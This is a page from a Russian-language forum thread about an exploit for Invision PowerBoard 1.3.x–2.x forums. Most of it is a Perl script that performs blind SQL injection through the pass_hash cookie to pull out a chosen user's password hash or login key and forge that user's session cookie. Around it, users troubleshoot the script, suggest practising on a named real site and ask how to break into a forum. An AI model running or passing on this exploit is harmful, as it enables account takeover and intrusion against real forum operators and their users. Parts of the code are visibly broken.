Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4
RSS
[HSC Security] Invision PowerBoard 1.3.x - 2.x Exploit
 
Точно xorg - гавно дырявое! На нем тренероваться нада! :!:
 
А у меня и на xorg.ru не пашет даже!
ЗЫ Я посмотрел на них там!
Все флудеры! А бедного cfpcc замучили ублюдки! На них только и нада тренероваться! :!:
 
какого фига одни нули, где ошибка????
 
Офигеть, дайте две....

ну-ну.
 
Mlin che toka ne delal vse ravno odni 0000000  :-((((   v chem tam oshibka?
 
Заработало.

У меня оказывается не "Вход".
А "Авторизация".
 
На сайте написано Вход, но если заменить пишет ошибку :'(
 
#!/usr/bin/perl -w

# This one actually works  Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org

# edited by rav3n http://skidеs.net.ru

use IO::Socket;

if (!$ARGV[0]) {$ARGV[0] = ;}
if (!$ARGV[3]) {$ARGV[3] = ;}

my $host = $ARGV[0]; # hostname
my $path = $ARGV[1] . index.php?act=Login&CODE=autologin;
my $user = $ARGV[2]; # userid to jack
my $iver = $ARGV[3]; # version 1 or 2
if($ARGV[4]) { $cpre = $ARGV[4] } else { $cpre = "" }
my $dbug = $ARGV[5]; # debug?
if (!$ARGV[3])
{
print "... By rav3n Usage: ipb_skides.pl site.org /forum/ [id] [ver1/2] [cookie_prefix] [debug].\n\n";
exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e" ,"f");
my $outputs = ;

M1:
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$curre nt%2527)/*" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%25 27$current%2527)/*";
$cookie = $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql;

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "FAILED\n\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Cookie: $cookie\n";
print $socket "Connection: close\n\n";

# If we get a valid sql request then this
# does not appear anywhere in the Location header
$pattern = act=Login&CODE=;

$failed = 0;
while(<$socket>)
{    
   if($dbug) { print };
   if(/$pattern/) { $failed = 1; }
}

if($failed==0){
     $outputs .= $current;
     print "$i char: $current\n";
     next M1;
}

}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;


НУ ВОТ КАКОГО ВЫКЛАДЫВАЬБ КОД С ОШИБКАМИ А??
 
Можно ли через perl и сплоит взламать форум ipb 2.0.4 установленном на денвере 2-й версии?
если да то по падробнее как это делается
и если можно скиньте ответ мне на jefry7@rambler.ru
- с уважением jefry7
Страницы: Пред. 1 2 3 4
Читают тему